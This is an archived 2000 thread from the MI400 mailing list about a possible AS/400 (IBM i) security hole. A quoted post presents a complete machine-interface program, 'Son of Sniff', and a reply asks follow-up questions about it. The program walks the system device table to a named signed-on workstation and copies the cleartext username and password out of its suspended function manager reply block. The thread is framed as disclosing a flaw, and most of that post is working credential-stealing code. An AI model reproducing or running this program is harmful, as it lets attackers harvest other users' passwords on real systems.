|
Is the workstation function manager reply block a global or by-job? How is the SID set for ?work? I was expecting to see some initialization for it. In my experience, you could see some interesting results if the main storage where ?work ends up already contains a pointer but I never worked with machine space pointers. Richard Jackson mailto:richardjackson@richardjackson.net www.richardjacksonltd.com Voice: 1 (303) 808-8058 Fax: 1 (303) 663-4325 -----Original Message----- From: owner-mi400@midrange.com [mailto:owner-mi400@midrange.com]On Behalf Of Gene_Gaunt/ReviewWorks@reviewworks.com Sent: Tuesday, July 18, 2000 7:12 AM To: MI400@midrange.com Subject: Re: New security holes? Was: Re: FW: paradox ? 'Son of Sniff', shall we say, displays the cleartext password from the suspended 'WS FM RB' of the signed-on workstation named in the external parameter. Last month's PTF SF62895 was a seperate issue in the ODP. The 'WS FM RB' contains the raw 5250 Read MDT Fields input buffer where each field is preceded by X'11' and hex row and column numbers. For example if sign-on screen's password input field is in default column 53, the RPGLE DSPLY operation shows the cleartext password in reverse-image underline turquoise (X'35'). Here is an MI version, minus the RPGLE DSPLY operation. DCL SPCPTR ?DEVICE PARM; DCL SPCPTR ?USERPASS PARM; DCL OL MAIN (?DEVICE, ?USERPASS) EXT PARM MIN(2); DCL DD DEVICE BAS(?DEVICE) CHAR(10); DCL DD USERPASS BAS(?USERPASS) CHAR(26); DCL SPCPTR ?TABLE BASPCO POS(225); DCL MSPPTR ?WORK; DCL DD FORWARD BAS(?WORK) POS(1) BIN(4); DCL DD NAME BAS(?WORK) POS(7) CHAR(10); DCL SPCPTR ?ODP BAS(?WORK) POS(129); DCL SYSPTR ?REQUEST BAS(?WORK) POS(97); DCL SPCPTR ?BUFFER BAS(?WORK) POS(65); DCL DD BUFFER BAS(?BUFFER) POS(7) CHAR(26); ENTRY * (MAIN) EXT; -- start here CPYBREP USERPASS, " "; -- clear previous stuff CPYBWP ?WORK, ?TABLE; -- point to device table SETSPPO ?WORK, 128; -- point to first entry AA: CMPBLA(B) NAME, DEVICE / EQ(BB); -- exit loop if found CMPNV(B) FORWARD, 0 / EQ(CC); -- exit loop if end of chain SETSPPO ?WORK, FORWARD; -- point to next entry B AA; -- repeat until found BB: CMPPTRT(B) ?ODP, * / EQ(CC); -- jump if not signed on CPYBWP ?WORK, ?ODP; -- point to open data path SETSPPFP ?WORK, ?REQUEST; -- point to 'WS FM RB' CPYBLA USERPASS, BUFFER; -- copy username & password CC: PEND; -- return to caller +--- | This is the MI Programmers Mailing List! | To submit a new message, send your mail to MI400@midrange.com. | To subscribe to this list send email to MI400-SUB@midrange.com. | To unsubscribe from this list send email to MI400-UNSUB@midrange.com. | Questions should be directed to the list owner/operator: dr2@cssas400.com +--- +--- | This is the MI Programmers Mailing List! | To submit a new message, send your mail to MI400@midrange.com. | To subscribe to this list send email to MI400-SUB@midrange.com. | To unsubscribe from this list send email to MI400-UNSUB@midrange.com. | Questions should be directed to the list owner/operator: dr2@cssas400.com +---
As an Amazon Associate we earn from qualifying purchases.
This mailing list archive is Copyright 1997-2024 by midrange.com and David Gibbs as a compilation work. Use of the archive is restricted to research of a business or technical nature. Any other uses are prohibited. Full details are available on our policy page. If you have questions about this, please contact [javascript protected email address].
Operating expenses for this site are earned using the Amazon Associate program and Google Adsense.